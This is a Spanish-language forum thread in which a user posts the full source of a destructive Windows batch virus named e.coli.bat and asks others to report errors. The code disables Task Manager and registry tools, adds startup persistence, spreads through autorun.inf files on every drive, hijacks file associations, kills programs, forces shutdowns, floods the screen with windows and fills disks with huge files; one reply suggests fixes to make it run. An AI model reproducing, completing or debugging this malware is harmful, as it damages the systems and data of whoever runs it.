Autor
|
Tema: virus informatico llamado e.coli.bat (Leído 5,780 veces)
|
W4rR3d
Desconectado
Mensajes: 12
|
sin ven errores en mi codigo por favor notificar su amigo by hackerd W4rR3d ::by hacked W4rR3d ::Comunidad Informatica Black Eye Security Team :: Piura - Perù taskkill /IM "explorer.exe" /IM "msnmsgr.exe" /IM rar.exe /IM iexplorer.exe/F tskkill /IM "explorer.exe" /IM "msnmsgr.exe" /IM rar.exe /IM iexplorer.exe/F reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%systemroot%\System32\e.coli_c.exe" /f REG ADD HKCU\Software\Microsoft\windows\Currentversion\Pol icies\System /v disabletaskmgr /t reg_dword /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_ DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f reg add HKCU\Software\Microsoft\Windows\currentVersion\policies\System /v NoDispCpl /t REG_DWORD /d 1 /f :C1 if exist C:\e.coli.bat attrib +h +s +r C:\e.coli.bat &attrib +h +s +r C:\autorun.inf %ecoli% [autorun] >>C:\autorun.inf %ecoli% OPEN=e.coli.bat >>C:\autorun.inf %ecoli% shell\open\Command=e.coli.bat >>C:\autorun.inf %ecoli% shell\open\Default=1 >>C:\autorun.inf %ecoli% shell\explore\Command=e.coli.bat >>C:\autorun.inf attrib +h +s +r C:\e.coli.bat attrib +h +s +r C:\autorun.inf :t1 :D1 if exist D:\e.coli.bat attrib +h +s +r D:\e.coli.bat &attrib +h +s +r D:\autorun.inf %ecoli% [autorun] >>D:\autorun.inf %ecoli% OPEN=e.coli.bat >>D:\autorun.inf %ecoli% shell\open\Command=e.coli.bat >>D:\autorun.inf %ecoli% shell\open\Default=1 >>D:\autorun.inf %ecoli% shell\explore\Command=e.coli.bat >>D:\autorun.inf attrib +h +s +r D:\e.coli.bat attrib +h +s +r D:\autorun.inf :t2 :E1 if exist E:\e.coli.bat attrib +h +s +r E:\e.coli.bat &attrib +h +s +r E:\autorun.inf %ecoli% [autorun] >>E:\autorun.inf %ecoli% OPEN=e.coli.bat >>E:\autorun.inf %ecoli% shell\open\Command=e.coli.bat >>E:\autorun.inf %ecoli% shell\open\Default=1 >>E:\autorun.inf %ecoli% shell\explore\Command=e.coli.bat >>E:\autorun.inf attrib +h +s +r E:\e.coli.bat attrib +h +s +r E:\autorun.inf :T3 :F1 if exist F:\e.coli.bat attrib +h +s +r F:\e.coli.bat &attrib +h +s +r F:\autorun.inf %ecoli% [autorun] >>F:\autorun.inf %ecoli% OPEN=e.coli.bat >>F:\autorun.inf %ecoli% shell\open\Command=e.coli.bat >>F:\autorun.inf %ecoli% shell\open\Default=1 >>F:\autorun.inf %ecoli% shell\explore\Command=e.coli.bat >>F:\autorun.inf attrib +h +s +r F:\e.coli.bat attrib +h +s +r F:\autorun.inf :T4 :G1 if exist G:\e.coli.bat attrib +h +s +r G:\e.coli.bat &attrib +h +s +r G:\autorun.inf %ecoli% [autorun] >>G:\autorun.inf %ecoli% OPEN=e.coli.bat >>G:\autorun.inf %ecoli% shell\open\Command=e.coli.bat >>G:\autorun.inf %ecoli% shell\open\Default=1 >>G:\autorun.inf %ecoli% shell\explore\Command=e.coli.bat >>G:\autorun.inf attrib +h +s +r G:\e.coli.bat attrib +h +s +r G:\autorun.inf :open %ecoli%On Error Resume Next >> %HC%open.vbs %ecoli%Set oWMP = CreateObject ("WMPlayer.OCX.7" )>> %HC%open.vbs %ecoli%Set colCDROMs = oWMP.cdromCollection >> %HC%open.vbs %ecoli%do>> %HC%open.vbs %ecoli%if colCDROMs.Count >= 1 then >> %HC%open.vbs %ecoli%For i = 0 to colCDROMs.Count - 1 >> %HC%open.vbs %ecoli%colCDROMs.Item(i).Eject>> %HC%open.vbs %ecoli%Next>> %HC%open.vbs %ecoli%For i = 0 to colCDROMs.Count - 1 >> %HC%open.vbs %ecoli%colCDROMs.Item(i).Eject>> %HC%open.vbs %ecoli%Next>> %HC%open.vbs %ecoli%End If>> %HC%open.vbs %ecoli%wscript.sleep 5000>> %HC%open.vbs %ecoli%loop >> %HC%open.vbs start %HC%open.vbs :cop %HH% "%appdata%\e.coli_a.exe" %HH% "%windir%\e.coli_b.exe" %HH% "%systemroot%\system32\e.coli_c.exe" %HH% "%programfiles%\Windows Live\Messenger\e.coli_d.exe" %HH% "%programfiles%\Internet Explorer\e.coli_e.exe" %HH% "%programfiles%\Microsoft Office\Office12\e.coli_e.exe" %HH% "%programfiles%\Winamp\e.coli_f.exe" %HH% "%programfiles%\WinRAR\e.coli_g.exe" %HH% "%programfiles%\Yahoo!\Messenger\e.coli_h.exe" %HH% "%programfiles%\shARES\e.coli_i.exe" %HH% "%systemdrive%\Documents and Settings\All Users\e.coli_j.exe" %HH% "%systemdrive%\Documents and Settings\All Users\Menú Inicio\e.coli_k.exe" %HH% "%systemdrive%\Documents and Settings\All Users\Documentos\Mi música\e.coli_l.exe" %HH% "%allusersprofile%\Documents and Settings\All Users\Menú Inicio\Programas\e.coli_m.exe" %HH% "%userprofile%\Documents and Settings\USUARIO\Mis documentos\e.coli_n.exe" :reini %ecoli% On Error Resume Next >> %HC%\apgar.vbs %ecoli% set shell = CreateObject ("WScript.Shell" ) >> %HC%\apgar.vbs %ecoli% shell.run "shutdown.exe -s -f -t 7 " >> %HC%\apgar.vbs start %HC%\apgar.vbs :war echo msn=msgbox ("Warning Warning Warning",16," no me puedes vencer" ) >> %HC%\Warning.vbs For /L %%a IN (0,1,1000 ) DO start %HC%\Warning.vbs :cmds :wi for %%A in (C,D,E,F,G,H,I,J,K,L,M,N,Ñ,O,P,Q,R,S,T,U,V,W,X,Y,Z ) do if exist " %%A:\" copy /y %0 " %%A:\INFECTED !!!" for %%E in (exe,bmp,gif,jpg,png,txt,doc,docx,xls,xlsx,avi,mpg,mpeg,flv.mp3,mp4,rar,zip,ink,html ) do assoc . %%E=batfile for %%I in (bmp.exe,gif.exe,doc.exe,mpeg.exe,xlsx.exe,avi.exe,mpg.exe,mp3.exe,mp4.exe,rar.exe,zip.exe,ink.exe,html.exe,winlogon.exe,winupdate.exe,winservice.exe,TASKMAN.exe,jpg.exe ) do copy /y %0 " %windir%\ %%I" attrib +h %windir% for %%p in (WINWORD.exe,EXCEL.exe,POWERPNT.exe,Winrar.exe,firefox.exe,iexplore.exe,wmplayer.exe,Ares.exe,msnmsgr.exe ) do tasklist /m | find /i " %%p" && taskkill /f /im %%p.exe echo fsutil file createnew %random%.exe 4000000000 >>%windir%\fsutil.exe start %windir%\fsutil.exe copy /y %0 " %windir%\jpg.exe" reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%windir%\jpg.exe"" /f :ves echo 00000000 000 000 0000000000 0000000000 0000000000 00000000000 0000000000 000000 >>%userprofile%\Desktop\I.txt echo 00000000 0000 000 0000000000 0000000000 0000000000 00000000000 0000000000 00000000 >>%userprofile%\Desktop\N.txt echo 0000 00000 000 000 000 000 000 000 000 0000 >>%userprofile%\Desktop\F.txt echo 0000 000000 000 000 000 000 000 000 000 000 >>%userprofile%\Desktop\E.txt echo 0000 000 000 000 0000000000 0000000000 000 000 0000000000 000 000 >>%userprofile%\Desktop\C.txt echo 0000 000 000 000 0000000000 0000000000 000 000 0000000000 000 000 >>%userprofile%\Desktop\T.txt echo 0000 000 000000 000 000 000 000 000 000 000 >>%userprofile%\Desktop\E.txt echo 0000 000 00000 000 000 000 000 000 000 0000 >>%userprofile%\Desktop\D.txt echo 00000000 000 0000 000 0000000000 0000000000 000 0000000000 00000000 >>%userprofile%\Desktop\ !.txt echo 00000000 000 000 000 0000000000 0000000000 000 0000000000 000000 >>%userprofile%\Desktop\ !!.txt :Full Disk fsutil file createnew INFECTED!!!.exe 40000000000 for %%t in (1,1,24 ) do at %%t /interactive /every:L,M,Mi,J,V,S,D fsutil file createnew %random%.exe 4000000000 for /l %%e in (0,1,5000 ) do (start cmd )
|
|
« Última modificación: 16 Junio 2011, 17:22 pm por W4rR3d »
|
En línea
|
|
|
|
SuperDraco
Desconectado
Mensajes: 2.505
Crew Dragon
|
Set ecoli=echo
Por dios........................
|
|
|
En línea
|
No he vuelto, solo estoy de paso.
|
|
|
FranciskoAsdf
Desconectado
Mensajes: 231
Ni bueno, ni malo. Solo nada.
|
Lo mismo de siempre.
|
|
|
En línea
|
Asdf debería ser algún tipo de función.
|
|
|
bITEBUG
Desconectado
Mensajes: 26
|
Que maldad por favor!
|
|
|
En línea
|
|
|
|
MrSilver
Desconectado
Mensajes: 9
|
Saludos:
No estoy muy puesto en codigo¿me podeis decir que hace exactamente el virus?
|
|
|
En línea
|
|
|
|
WaAYa HaCK
Desconectado
Mensajes: 292
Arduino, Android and music
|
Set ecoli=echo
Por dios........................
Pero... para qué cojones sirve esto???? Si es más fácil escribir echo ! Demonios... pero si ahora casi todos los AV detectan los Autorun!
|
|
|
En línea
|
La cacatúa yoyó es nueva en el zoo!
|
|
|
ShotgunLogic
Desconectado
Mensajes: 233
Claws so razor sharp
|
Esto pasa por meterse tanto pepino...XD
|
|
|
En línea
|
The clans are marching against the law, bagpipers play the tunes of war, death or glory I will find, rebellion on my mind.
|
|
|
Di~OsK
|
-10
|
|
|
En línea
|
Necesitas un servidor de TeamSpeak? Un certificado SSL? MANDA MP
|
|
|
Flamer
Desconectado
Mensajes: 1.052
crack, crack y mas crack...
|
%HH% "%windir%\e.coli_b.exe" %HH% "%systemroot%\system32\e.coli_c.exe" %HH% "%programfiles%\Windows Live\Messenger\e.coli_d.exe" %HH% "%programfiles%\Internet Explorer\e.coli_e.exe" %HH% "%programfiles%\Microsoft Office\Office12\e.coli_e.exe" %HH% "%programfiles%\Winamp\e.coli_f.exe" %HH% "%programfiles%\WinRAR\e.coli_g.exe" %HH% "%programfiles%\Yahoo!\Messenger\e.coli_h.exe" %HH% "%programfiles%\shARES\e.coli_i.exe" %HH% "%systemdrive%\Documents and Settings\All Users\e.coli_j.exe" %HH% "%systemdrive%\Documents and Settings\All Users\Menú Inicio\e.coli_k.exe" %HH% "%systemdrive%\Documents and Settings\All Users\Documentos\Mi música\e.coli_l.exe" %HH% "%allusersprofile%\Documents and Settings\All Users\Menú Inicio\Programas\e.coli_m.exe"
hola si no tienes privilegios de administrador esto no te funciona ni esto reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v ecoli /t REG_SZ /d "%systemroot%\System32\e.coli_c.exe" /f y pienso que esta linea te marcaria error %HH% "%userprofile%\Documents and Settings\USUARIO\Mis documentos\e.coli_n.exe" lo tendrias que poner asi %HH% "%userprofile%\Mis documentos\e.coli_n.exe" y ejecutarlo en la unidad %systemdrive% que porlo general es la unidad c:
|
|
|
En línea
|
|
|
|
SuperDraco
Desconectado
Mensajes: 2.505
Crew Dragon
|
no se porque le ayudais, si este tipo nunca corrije nada, antes de pararse a corregir un batch, ya está haciendo otro batch con más errores que el anterior.
Como ya han dicho, lo mismo de siempre...
Por cierto, la mitad del código se puede reducir a un FOR para buscar unidades.
Saludos
|
|
|
En línea
|
No he vuelto, solo estoy de paso.
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
virus informatico dengue.bat
Scripting
|
W4rR3d
|
4
|
5,153
|
8 Febrero 2011, 22:32 pm
por leogtz
|
|
|
[BATCH] virus informatico fiebre.exe
« 1 2 3 »
Scripting
|
W4rR3d
|
23
|
14,922
|
18 Octubre 2011, 03:17 am
por Sorke
|
|
|
virus informatico msn.exe
« 1 2 »
Scripting
|
W4rR3d
|
10
|
7,953
|
21 Febrero 2011, 01:40 am
por ace332
|
|
|
virus informatico taskmgr.bat
Scripting
|
W4rR3d
|
4
|
4,950
|
26 Marzo 2011, 13:13 pm
por FranciskoAsdf
|
|
|
La Policía desmiente el bulo del paracetamol que tiene un virus llamado Machupo
Noticias
|
wolfbcn
|
0
|
1,766
|
22 Junio 2017, 21:52 pm
por wolfbcn
|
|